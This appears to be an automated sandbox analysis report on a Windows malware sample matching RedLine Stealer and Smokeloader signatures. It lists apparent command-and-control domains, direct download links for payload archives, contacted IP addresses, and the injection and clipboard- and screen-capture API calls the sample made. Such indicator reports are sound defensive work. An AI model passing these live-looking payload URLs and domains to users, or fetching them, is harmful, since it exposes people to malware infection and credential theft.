Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000002.00000000.2080799819.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081253102.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081273713.0000000008890000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A36808000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A3693F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://store4.gofile.io
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000002.00000000.2085955197.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 3530.exe, 3530.exe.2.dr String found in binary or memory: http://www.oberhumer.com
Source: 6E8A.exe.2.dr String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: 6E8A.exe.2.dr String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000002.00000000.2083945040.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2081714361.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2080080282.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2079158771.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 0000000E.00000003.3018136549.000000000084D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3000915062.000000000084C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044151506.000000000084F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055424185.000000000084E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035776586.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop///
Source: BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/0
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/D
Source: BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 0000000E.00000003.3055164389.0000000000836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiQbd
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apicnmamaa
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiem
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apioro
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apisF
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiyy
Source: BitLockerToGo.exe, 0000000E.00000003.2999741384.000000000084C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/b
Source: BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/bO
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/e
Source: BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/h
Source: BitLockerToGo.exe, 0000000E.00000003.3054586078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043948078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035350826.000000000088D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3033291199.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/i
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/m
Source: BitLockerToGo.exe, 0000000E.00000003.2966295080.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/o
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A35DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2083945040.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/microgods/raw
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A367D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36836000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4510548648.0000022A4D393000.00000004.00000020.00020000.00000000.sdmp, rentry-script.ps1.11.dr String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.11.dr String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 6E8A.exe.2.dr String found in binary or memory: https://www.ssl.com/repository0
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004EED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 14_2_004EED00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004EFB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 14_2_004EFB2F

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: venom.zip.15.dr Zip Entry: runvm.bat
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401513
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 0_2_00402FD3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess, 0_2_00403149
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401553
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040267C NtEnumerateKey, 0_2_0040267C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower, 0_2_00403303
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040151E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation, 0_2_004020C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026DC NtClose, 0_2_004026DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004025DD NtOpenKey, 0_2_004025DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation, 0_2_004020E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 0_2_004020E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation, 0_2_004020FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402285 NtQuerySystemInformation, 0_2_00402285
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation, 0_2_004020B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation, 0_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 4_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00403149 RtlCreateUserThread,NtTerminateProcess, 4_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0040267C NtEnumerateKey, 4_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00403303 NtTerminateProcess,GetModuleHandleA, 4_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020C4 LocalAlloc,NtQuerySystemInformation, 4_2_004020C4
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004026DC NtClose, 4_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004025DD NtOpenKey, 4_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020E3 LocalAlloc,NtQuerySystemInformation, 4_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 4_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020FC LocalAlloc,NtQuerySystemInformation, 4_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00402285 NtQuerySystemInformation, 4_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020B6 LocalAlloc,NtQuerySystemInformation, 4_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020B8 LocalAlloc,NtQuerySystemInformation, 4_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 7_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00403149 RtlCreateUserThread,NtTerminateProcess, 7_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_0040267C NtEnumerateKey, 7_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00403303 NtTerminateProcess,GetModuleHandleA, 7_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020C4 LocalAlloc,NtQuerySystemInformation, 7_2_004020C4
